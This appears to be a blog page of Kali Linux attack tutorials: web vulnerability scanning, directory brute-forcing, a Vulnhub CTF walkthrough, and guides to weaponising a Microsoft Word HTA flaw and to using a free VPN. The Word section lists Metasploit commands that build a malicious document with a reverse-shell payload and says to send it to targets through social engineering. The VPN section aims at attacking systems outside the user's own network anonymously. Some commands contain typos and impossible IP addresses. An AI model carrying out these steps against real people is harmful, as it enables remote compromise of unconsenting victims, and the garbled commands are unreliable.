Showing posts with label Kali Linux. Show all posts
Showing posts with label Kali Linux. Show all posts

Scan Website Vulnerability using Uniscan (Beginner Guide)

Through this article we are trying to elaborate the word Enumeration using Kali Linux tool UNISCAN.
Uniscan is a simple Remote File Include, Local File Include and Remote Command Execution vulnerability scanner as well as work as enumerating tool in order to gather information like open ports and protocol related to target and investigate it against any vulnerability.
Let’s start!!!

Open the terminal and type following command using –j option for server fingerprints



It will start enumeration from PING by sending icmp packets to targeted server and establish the connection.
Further it will use TRACEROUTE to show the path of a packet of information took from source to destination and list all the routers it travels through or fails to and is discarded. In actually, it will inform you how long each 'hop' from router to router takes.


NSLOOKUP is a program to query Internet domain name servers (DNS). NSLOOKUP or Reverse DNS (rDNS) is a method of resolving an IP address into a domain name


Uniscan made use of NMAP for aggressive scan against the targeted server to identify open ports and protocols services hence from screenshot you can observe the result.  It also enumerates the target using NMAP NSE script to identify the vulnerability and details of running services.


Now type following command for dynamic scan against the targeted server using –d option.
 Now it will load the selected plug-in for fetching more details related to targeted server.


From given screenshot you can observe the result where it came up with an email id moreover loaded further plug-in for scanning vulnerability like sql injection, remote or local file inclusion and xss.


From given below screenshot you can see it has used blind sql injection and return a link of the targeted web pages. Similarly it will test for xss and remote or local file inclusion vulnerability.


Now type next command using –q option to enable directory test in targeted server
Uniscan –u http://192.168.1.1107 –q
Form scanning result you can read the fetched directories.


Last but not least use –g option for web fingerprints with following command
Uniscan –u http://192.168.1.1107 –g
Here we have come across available http option GET, HEAD, POST, OPTION, and TRACE which might help in verb tampering.


It will try to find out web service and error information and type of error as shown in given image.


Here this tool inserts a string in html in order to grab banner moreover we have come across the credential of web server and from given screenshot you can read login msfadmin: msfadmin

5 Ways to Directory Bruteforcing on Web Server

In this article we have focus towards directory brute force attack using Kali Linux tool and try to find hidden files and directories inside web server for penetration testing.

A path traversal attack also known as directory traversal aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (.../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. For more information visit owasp.org
Let’s Start!!!

DIRB
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response. DIRB main purpose is to help in professional web application auditing.

The tool “Dirb” is in built in kali Linux therefore Open the terminal and type following command to start brute force directory attack.


Hence you can see read the fetched directories and file in the given screenshot.


DirBuster

DirBuster is a multi-threaded java application designed to brute force directories and files names on web/application servers. DirBuster comes with total of 9 different lists; this makes DirBuster extremely effective at finding those hidden files and directories.

Similarly open the terminal and type Dirbuster, then enter the target URL as shown in below image and browse /usr/share/dirbuster/wordlis/ directory-list-2-3-medium.txt for brute force attack.

Select option dir to start with /dvwa, once you have configured the tool for attack click on start.


This will start the brute force attack and dumps all file and directory present inside web server as shown in given screenshot.


Wfuzz

Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.

wfuzz -c -W /usr/share/wfuzz/wordlist/dir/common.txt --hc 400,404,403 http://192.168.1.5/dvwa/FUZZ

Here option –c is use for output with color; -W for wordlist; --hc for hide responses with the specified code/lines/words/chars. It is also in-built in your kali Linux.


Metasploit

HTTP Directory Scanner
This module identifies the existence of interesting directories in a given directory path.
use auxiliary/scanner/http/dir_scanner   
 msf auxiliary(dir_scanner) >set  /usr/share/wfuzz/wordlist/dirb/common.txt
msf auxiliary(dir_scanner) >set rhosts 192.168.1.5
msf auxiliary(dir_scanner) > set path /dvwa
msf auxiliary(dir_scanner) >exploit


Dirsearch

Dirsearch is a simple command line tool designed to brute force directories and files in websites. This tool is available at gith
ub you can download it from there and after installation in your kali Linux type following to start dirsearch. 

./dirsearch.py –u http://192.18.1.5/dvwa -e php -f -x 400,403,404

Here option –e is use for generating one entry for php extension; -x hide responses with the specified code/lines/words/chars.
From given screenshot you can read php file of the targeted web server.

Exploit Remote PC using Microsoft Office Word Malicious Hta Execution

For Kali Linux users we had perform this attack through metasploit without using any python script which generates .rtf file for attack, thus the user only need to update their kali Linux and load metasploit framework to start this attack. This is a zero –day exploit that has excellent rating against Ms-office vulnerability which can be very easily used to shoot any targeted windows system.

Attacker: Kali Linux
Target: MS Office

Let’s breach!!


msfconsole


This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how an OLE link object can make an http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.

Object Linking and Embedding Based on Component Object Model (COM) provides the majority of compatibility on Office, Working with default/third-party applications to provide rich documentation features to Office users.
Use exploit/windows/fileformat/office_word_hta
Msf > exploit (office_word_hta) >set srvhost 192.168.1.8
Msf > exploit (office_word_hta) >set paylod windows/meterpreter/revrese_tcp
Msf > exploit (office_word_hta) >set filename sale.doc
Msf > exploit (office_word_hta) >set lhost 192.168.1.8
Msf > exploit (office_word_hta) >exploit

 This module will automatically generate a malicious .rtf file inside /root/.msf4/local/sales.doc moreover it will generate a link and that link must be share to target using social engineering method.


When the user will open that link and make double click (OLE event) on .hta file, the attacker will received meterpreter sesssion in metasploit framewok.
Meterpreter > sysinfo

Hack the Defense CTF (CTF Challenge)

Defence VM is made by Silex Secure team. This VM is designed to honor and pay respects to the military of Nigeria and the soldiers who stood up against the terrorist attack. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. You can download it from àhttps://www.vulnhub.com/entry/defence-space-ctf-2017,179/

Are you ready for the challenge soldier? First step to attack is to identify the target. So, identify your target. To identify the target we will use the following command:


netdiscover


Now that you have identify your target (mine is 192.168.1.17) you will need to acquire it and declare you victory.  In order to acquire it we will need a plan to enter our enemy. To let us search for all the doors, closed or not. And for that let’s fire up the nmap.
nmap  -p- -A 192.168.1.17


Our search has led us to the result that Port nos. 21, 80,443, 2225 is open with the services of FTP, HTTP, HTTPS, SSH respectively. As the port 80 is open we can open our target IP in the browser.


But there is no hint or what-so-ever in there. But as this based on military aspects the hint could be camouflaged. Therefore let’s check the source code.

And yes!! We have found the flag 0 although it is coded base64. Upon decoding it will become netdiscover.

As the source is unknown territory, I inspected more and found that there was a directory which proved to be very useful : assests/lafiya.js


Open the said directory in browser and check it source code. In the source code you will find flag 1 which will be in hex.


Upon converting hex you will uncover flag 2 in an MD5 form.


When you convert MD5 value to its original, it will be nmap as shown in the image below.


The second flag was nmap that means there is something the nmap that we missed. And upon reviewing it I remembered that SSH service was open on the port 2225. And so I accessed it with the following command.
ssh 192.168.1.17 –p 2225


And there we have it our flag 2B in an MD5 value. Let’s convert it.


Our flag 2B is encrypt. That means there is something related to encryption and security. Now the best way to provide security to a website is through it security certificate. Let’s check it out.


Now, upon examining the certificate, you will find your third flag and a hint i.e [39 39 30].


Firstly, decode the flag which will be unit.


The combination of 3, 9, 0 will be the suffix of the word unit. But there are a lot of combination foe it so let’s create those combinations with the help of crunch with command:
crunch 3 3 390


We will get 27 possible combinations and so make a text file for dictionary attack and add the word ‘unit’ as a prefix to every combination. Now let’s use dirb to find anything related to unit and these combinations.
dirb http://192.168.1.17 /rot/Desktop/dict.txt


To our joy there is a directory that goes by unit990. Let’s open it in our browser without further delay.


We do not have credentials for logging in. So, I checked it source code instead. In the source code you will find flag 4 in a base64 code.


Decode the flag and you will get admin.php



Opening the previously found directory in the browser will show the same page but its source code is edited. As you will check it, you will find that flag 5 again in base64 code.


By decoding flag 5 you will get SQL injection. That means next step should be SQL injection.


Now this hint is just to throw us of our track. I used every SQL injection technique I could find but it didn’t help. So I used dirb on the target.

dirb http://192.168.1.17


I found a directory called assets. And opened it in the browser and found the 7th flag.


Now try and decode it widgets.

Now you can try and decode it but it’s hopeless to decode it anywhere online. So examined the dirb result more and found another directory called phpmyadmin


If you open this directory in browser you will find a log in page. I used the top 10 most commonly used password and username i.e root and root and got in. In the database I found a silex table. Now silex is the team’s name so I guess this is most important table.


Upon checking it, I found admin and in admin there was our 6th flag coded in base64


Upon decoding, it says Nigiarforcecloud.


And voila!! All our flags are uncovered. Good work soldiers. Solving this VM was good exercise and I salute the fallen Nigerian soldiers and wish them peace and praise the whole army.

How to use Public IP on Kali Linux

Today through this article you will learn how an attacker can use anonymous VPN service to occupy public IP which will surly expand the area of your target list and you will be able to attack outside your network also.
Let’s Start!
In your kali Linux Open the terminal and type following command to start pptp service for VPN configuration.

apt-get install network-manager-pptp


apt-get install network-manager-pptp-gnome


Ipjetable.net is the web site which provides free VPN service to their registered users but this site will open through proxy server so therefore I took help of free-proxy.xyz to open ipjettable.net web page.


Here you need to unlock the website so that you can use open vpn service anonymously. Click on I subscribe tab. Here I had Google translator.


Then it requires registration for unlocking VPN service now gives your email id for registration. I had use temporary email id for registration.


When you will register into web site it will send you a mail in your inbox which contains username and password that we will use for VPN login. In given screenshot you can observe we have highlighted the link, copy this link.


Now past above copied link inside free-proxy.xyz as done above for unlocking login page for VPN service.
When you will unlock it, the given below web page will gets open inside browser which will ask for login credential now give username and password which have received through mail.


Now click on install ipjetable which start VPN service installation for your local network.


Inside your kali Linux click on power icon available on right side corner of screen to configuration VPN then select wired connected.


Now click on (+) “plus” to add new network connection.


Select point to point tunneling protocol


Now add username and password to connect which VPN server. Then click on advance tab and select radio button store password only for this user.


From given screenshot select the check box for PPTP authentication and encryption then once all configurations is completed click on ok. Till here we have configured VPN service successfully in our kali linux.


Let check our vpn IP that we have occupied 
Ifconfig
From screenshot you can read 192.168.0.102 is my local ip and 141.255.151.15 is our public IP now use this IP for your attack even outside of your network also.